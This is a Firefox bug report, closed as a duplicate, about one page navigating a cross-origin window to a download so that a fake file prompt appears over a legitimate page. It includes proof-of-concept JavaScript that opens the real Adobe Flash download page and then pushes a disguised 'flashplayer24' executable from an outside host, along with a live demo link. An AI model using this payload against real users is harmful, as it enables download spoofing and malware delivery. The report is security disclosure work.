Closed
Bug 1342324
Opened 8 years ago
Closed 8 years ago
Navigating to non-same origin windows.
Categories
(Firefox :: Untriaged, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 741050
People
(Reporter: mishra.dhiraj95, Unassigned)
Details
Attachments
(1 file)
|
631.48 KB,
application/zip
|
Details |
User Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0
Build ID: 20170118123525
Steps to reproduce:
Firefox Version :
FF ESR in Windows 7
FF Stabe in Windows 7
Another Intersting Navigation trick.
It is an little-known property of web browsers that one document can always navigate other, non-same-origin windows to arbitrary URLs. Perhaps more interestingly, you can also navigate
third-party documents to resources served with Content-Disposition attachment, in which case, you get the original contents of the address bar, plus a rogue download prompt attached to an unsuspecting page that never wanted you to download that file.
Expected results:
Code :
<input type=submit onclick="doit()" value="Click me. I like to be clicked.">
<script>
var w;
var once;
function doit() {
if (navigator.userAgent.indexOf('MSIE') != -1)
w = window.open('page2.html', 'foo');
else
w = window.open('data:text/html,<meta http-equiv="refresh" content="0;URL=http://get.adobe.com/flashplayer/download/?installer=Flash_Player_11_for_Internet_Explorer_(64_bit)&os=Windows%207&browser_type=MSIE&browser_dist=OEM&d=Google_Toolbar_7.0&PID=4166869">', 'foo');
setTimeout(donext, 4500);
}
function donext() {
window.open('http://hackies.in/flashplayer24_ka_install.exe', 'foo');
if (once != true) setTimeout(donext, 5000);
once = true;
}
</script>
Live Demo : http://hackies.in/nav.html
Attaching th Test case and the Video POC for refrence.
|
||
Comment 1•8 years ago
|
||
Please don't just copy and paste lcamtuf posts.
Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE
You need to log in
before you can comment on or make changes to this bug.
Description
•